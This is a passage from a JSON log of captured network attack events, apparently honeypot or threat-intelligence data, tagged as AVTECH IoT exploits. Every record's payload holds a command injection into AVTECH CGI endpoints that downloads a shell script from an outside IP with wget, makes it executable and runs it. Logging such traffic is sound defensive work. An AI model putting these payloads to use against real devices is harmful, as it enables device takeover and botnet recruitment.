9334.       "protocol": "tcp",
9335.       "tags": [
9336.         {
9337.           "cve": "",
9338.           "category": "IoT",
9339.           "description": "AVTECH Exploit"
9340.         }
9341.       ],
9342.       "event_count": 1,
9343.       "first_seen": "2020-05-31T21:59:10Z",
9344.       "last_seen": "2020-05-31T21:59:10Z"
9345.     },
9346.     {
9347.       "event_id": "dbc10d11b196132a1bf54426871705311db32df69da5b65f0db6ce9b20cecd18",
9348.       "source_ip_address": "35.193.32.21",
9349.       "country": "US",
9350.       "user_agent": "Snickers-Avtech",
9351.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh w00dy.botsh; echo snickers_was_here HTTP/1.1",
9352.       "post_data": "",
9353.       "target_port": 2087,
9354.       "protocol": "tcp",
9355.       "tags": [
9356.         {
9357.           "cve": "",
9358.           "category": "IoT",
9359.           "description": "AVTECH Exploit"
9360.         }
9361.       ],
9362.       "event_count": 1,
9363.       "first_seen": "2020-05-31T21:59:05Z",
9364.       "last_seen": "2020-05-31T21:59:05Z"
9365.     },
9366.     {
9367.       "event_id": "90808b9dd3c6dbf54b46422cf5b6c3e0316fc574ee6d17076b7018a200cc170c",
9368.       "source_ip_address": "35.193.32.21",
9369.       "country": "US",
9370.       "user_agent": "Snickers-Avtech",
9371.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
9372.       "post_data": "",
9373.       "target_port": 2087,
9374.       "protocol": "tcp",
9375.       "tags": [
9376.         {
9377.           "cve": "",
9378.           "category": "IoT",
9379.           "description": "AVTECH Exploit"
9380.         }
9381.       ],
9382.       "event_count": 1,
9383.       "first_seen": "2020-05-31T21:59:02Z",
9384.       "last_seen": "2020-05-31T21:59:02Z"
9385.     },
9386.     {
9387.       "event_id": "6562a07d2a002582fdc9a0b91bc4f8e6538a44d1fa3d8d0409d39bee73c7906a",
9388.       "source_ip_address": "35.193.32.21",
9389.       "country": "US",
9390.       "user_agent": "Snickers-Avtech",
9391.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh w00dy.botsh; echo snickers_was_here HTTP/1.1",
9392.       "post_data": "",
9393.       "target_port": 37215,
9394.       "protocol": "tcp",
9395.       "tags": [
9396.         {
9397.           "cve": "",
9398.           "category": "IoT",
9399.           "description": "AVTECH Exploit"
9400.         }
9401.       ],
9402.       "event_count": 1,
9403.       "first_seen": "2020-05-31T21:58:43Z",
9404.       "last_seen": "2020-05-31T21:58:43Z"
9405.     },
9406.     {
9407.       "event_id": "181ecbae2164c235e36f958f61218c3d63df97a46a73dcc97e7d4bcf18240869",
9408.       "source_ip_address": "35.193.32.21",
9409.       "country": "US",
9410.       "user_agent": "Snickers-Avtech",
9411.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
9412.       "post_data": "",
9413.       "target_port": 37215,
9414.       "protocol": "tcp",
9415.       "tags": [
9416.         {
9417.           "cve": "",
9418.           "category": "IoT",
9419.           "description": "AVTECH Exploit"
9420.         }
9421.       ],
9422.       "event_count": 1,
9423.       "first_seen": "2020-05-31T21:58:41Z",
9424.       "last_seen": "2020-05-31T21:58:41Z"
9425.     },
9426.     {
9427.       "event_id": "75d81aa189951f92848a7b6573f8f36855b0d97949fc0c8e65ed3432e979a306",
9428.       "source_ip_address": "35.193.32.21",
9429.       "country": "US",
9430.       "user_agent": "Snickers-Avtech",
9431.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh; echo snickers_was_here HTTP/1.1",
9432.       "post_data": "",
9433.       "target_port": 8139,
9434.       "protocol": "tcp",
9435.       "tags": [
9436.         {
9437.           "cve": "",
9438.           "category": "IoT",
9439.           "description": "AVTECH Exploit"
9440.         }
9441.       ],
9442.       "event_count": 1,
9443.       "first_seen": "2020-05-31T21:56:01Z",
9444.       "last_seen": "2020-05-31T21:56:01Z"
9445.     },
9446.     {
9447.       "event_id": "5cbbf97cd31bb9bd5672d74e1305d56d1a78dd4fa7a74462c6339f95e1a96af0",
9448.       "source_ip_address": "35.193.32.21",
9449.       "country": "US",
9450.       "user_agent": "Snickers-Avtech",
9451.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
9452.       "post_data": "",
9453.       "target_port": 8000,
9454.       "protocol": "tcp",
9455.       "tags": [
9456.         {
9457.           "cve": "",
9458.           "category": "IoT",
9459.           "description": "AVTECH Exploit"
9460.         }
9461.       ],
9462.       "event_count": 1,
9463.       "first_seen": "2020-05-31T21:56:00Z",
9464.       "last_seen": "2020-05-31T21:56:00Z"
9465.     },
9466.     {
9467.       "event_id": "7db7c17e104fc685e9e7e7b83f6d22027acc8316fa606f33380949795b5d3c8d",
9468.       "source_ip_address": "35.193.32.21",
9469.       "country": "US",
9470.       "user_agent": "Snickers-Avtech",
9471.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
9472.       "post_data": "",
9473.       "target_port": 8139,
9474.       "protocol": "tcp",
9475.       "tags": [
9476.         {
9477.           "cve": "",
9478.           "category": "IoT",
9479.           "description": "AVTECH Exploit"
9480.         }
9481.       ],
9482.       "event_count": 1,
9483.       "first_seen": "2020-05-31T21:55:59Z",
9484.       "last_seen": "2020-05-31T21:55:59Z"
9485.     },
9486.     {
9487.       "event_id": "bf53abb35a930c0bce99d57cd7bcfec0190b74c04c5fb943b1dbe8dcf4925117",
9488.       "source_ip_address": "35.193.32.21",
9489.       "country": "US",
9490.       "user_agent": "Snickers-Avtech",
9491.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh; echo snickers_was_here HTTP/1.1",
9492.       "post_data": "",
9493.       "target_port": 9000,
9494.       "protocol": "tcp",
9495.       "tags": [
9496.         {
9497.           "cve": "",
9498.           "category": "IoT",
9499.           "description": "AVTECH Exploit"
9500.         }
9501.       ],
9502.       "event_count": 1,
9503.       "first_seen": "2020-05-31T21:55:56Z",
9504.       "last_seen": "2020-05-31T21:55:56Z"
9505.     },
9506.     {
9507.       "event_id": "b815fa5c04e3e6e2019d640ea71060cea7a2d3f8cbc96ead18450288981bd4ef",
9508.       "source_ip_address": "35.193.32.21",
9509.       "country": "US",
9510.       "user_agent": "Snickers-Avtech",
9511.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
9512.       "post_data": "",
9513.       "target_port": 9000,
9514.       "protocol": "tcp",
9515.       "tags": [
9516.         {
9517.           "cve": "",
9518.           "category": "IoT",
9519.           "description": "AVTECH Exploit"
9520.         }
9521.       ],
9522.       "event_count": 1,
9523.       "first_seen": "2020-05-31T21:55:54Z",
9524.       "last_seen": "2020-05-31T21:55:54Z"
9525.     },
9526.     {
9527.       "event_id": "852fb0a5125f23602ff609902707a770f4a3ac7acb9bcfde434c2e2c98a34ecf",
9528.       "source_ip_address": "35.193.32.21",
9529.       "country": "US",
9530.       "user_agent": "Snickers-Avtech",
9531.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh; echo snickers_was_here HTTP/1.1",
9532.       "post_data": "",
9533.       "target_port": 7547,
9534.       "protocol": "tcp",
9535.       "tags": [
9536.         {
9537.           "cve": "",
9538.           "category": "IoT",
9539.           "description": "AVTECH Exploit"
9540.         }
9541.       ],
9542.       "event_count": 1,
9543.       "first_seen": "2020-05-31T21:55:52Z",
9544.       "last_seen": "2020-05-31T21:55:52Z"
9545.     },
9546.     {
9547.       "event_id": "ed7ec6ac5eaf61dbd50ac7b11e2db74287bfdcc8519492fb044a309dcad2fb5c",
9548.       "source_ip_address": "35.193.32.21",
9549.       "country": "US",
9550.       "user_agent": "Snickers-Avtech",
9551.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh; echo snickers_was_here HTTP/1.1",
9552.       "post_data": "",
9553.       "target_port": 7001,
9554.       "protocol": "tcp",
9555.       "tags": [
9556.         {
9557.           "cve": "",
9558.           "category": "IoT",
9559.           "description": "AVTECH Exploit"
9560.         }
9561.       ],
9562.       "event_count": 1,
9563.       "first_seen": "2020-05-31T21:55:51Z",
9564.       "last_seen": "2020-05-31T21:55:51Z"
9565.     },
9566.     {
9567.       "event_id": "0d564eb754bd05f078a20e191ac21e3cf41b52484bf749d611024a91473a6abf",
9568.       "source_ip_address": "35.193.32.21",
9569.       "country": "US",
9570.       "user_agent": "Snickers-Avtech",
9571.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
9572.       "post_data": "",
9573.       "target_port": 7547,
9574.       "protocol": "tcp",
9575.       "tags": [
9576.         {
9577.           "cve": "",
9578.           "category": "IoT",
9579.           "description": "AVTECH Exploit"
9580.         }
9581.       ],
9582.       "event_count": 1,
9583.       "first_seen": "2020-05-31T21:55:50Z",
9584.       "last_seen": "2020-05-31T21:55:50Z"
9585.     },
9586.     {
9587.       "event_id": "3c4aae7c0e05c1e9892fcc2cb2495a4ead1734694554e4bc2cc6f9d4bae676b6",
9588.       "source_ip_address": "35.193.32.21",
9589.       "country": "US",
9590.       "user_agent": "Snickers-Avtech",
9591.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
9592.       "post_data": "",
9593.       "target_port": 7001,
9594.       "protocol": "tcp",
9595.       "tags": [
9596.         {
9597.           "cve": "",
9598.           "category": "IoT",
9599.           "description": "AVTECH Exploit"
9600.         }
9601.       ],
9602.       "event_count": 1,
9603.       "first_seen": "2020-05-31T21:55:49Z",
9604.       "last_seen": "2020-05-31T21:55:49Z"
9605.     },
9606.     {
9607.       "event_id": "19421c47dfa0a83a2ebacd0342bd6dd04c11e12ae883e299d9ccfa4df07fb623",
9608.       "source_ip_address": "35.193.32.21",
9609.       "country": "US",
9610.       "user_agent": "Snickers-Avtech",
9611.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh; echo snickers_was_here HTTP/1.1",
9612.       "post_data": "",
9613.       "target_port": 8291,
9614.       "protocol": "tcp",
9615.       "tags": [
9616.         {
9617.           "cve": "",
9618.           "category": "IoT",
9619.           "description": "AVTECH Exploit"
9620.         }
9621.       ],
9622.       "event_count": 1,
9623.       "first_seen": "2020-05-31T21:55:28Z",
9624.       "last_seen": "2020-05-31T21:55:28Z"
9625.     },
9626.     {
9627.       "event_id": "47f23b7c510f1fe373d7399cbc914c8b49a24d6ffe1827b902fdaef6f5d2738d",
9628.       "source_ip_address": "35.193.32.21",
9629.       "country": "US",
9630.       "user_agent": "Snickers-Avtech",
9631.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
9632.       "post_data": "",
9633.       "target_port": 8291,
9634.       "protocol": "tcp",
9635.       "tags": [
9636.         {
9637.           "cve": "",
9638.           "category": "IoT",
9639.           "description": "AVTECH Exploit"
9640.         }
9641.       ],
9642.       "event_count": 1,
9643.       "first_seen": "2020-05-31T21:55:26Z",
9644.       "last_seen": "2020-05-31T21:55:26Z"
9645.     },
9646.     {
9647.       "event_id": "e1e6e639a1be0c847c302b1bdd9d3912436cfe49d90869ee63dcb48c30214b2c",
9648.       "source_ip_address": "35.193.32.21",
9649.       "country": "US",
9650.       "user_agent": "Snickers-Avtech",
9651.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh; echo snickers_was_here HTTP/1.1",
9652.       "post_data": "",
9653.       "target_port": 8888,
9654.       "protocol": "tcp",
9655.       "tags": [
9656.         {
9657.           "cve": "",
9658.           "category": "IoT",
9659.           "description": "AVTECH Exploit"
9660.         }
9661.       ],
9662.       "event_count": 1,
9663.       "first_seen": "2020-05-31T21:55:19Z",
9664.       "last_seen": "2020-05-31T21:55:19Z"
9665.     },
9666.     {
9667.       "event_id": "579e4ff90df0250b084c2825c4abc94f567f1c7e133767f9992672c9eadc9aba",
9668.       "source_ip_address": "35.193.32.21",
9669.       "country": "US",
9670.       "user_agent": "Snickers-Avtech",
9671.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
9672.       "post_data": "",
9673.       "target_port": 8888,
9674.       "protocol": "tcp",
9675.       "tags": [
9676.         {
9677.           "cve": "",
9678.           "category": "IoT",
9679.           "description": "AVTECH Exploit"
9680.         }
9681.       ],
9682.       "event_count": 1,
9683.       "first_seen": "2020-05-31T21:55:17Z",
9684.       "last_seen": "2020-05-31T21:55:17Z"
9685.     }
9686.   ]
9687. }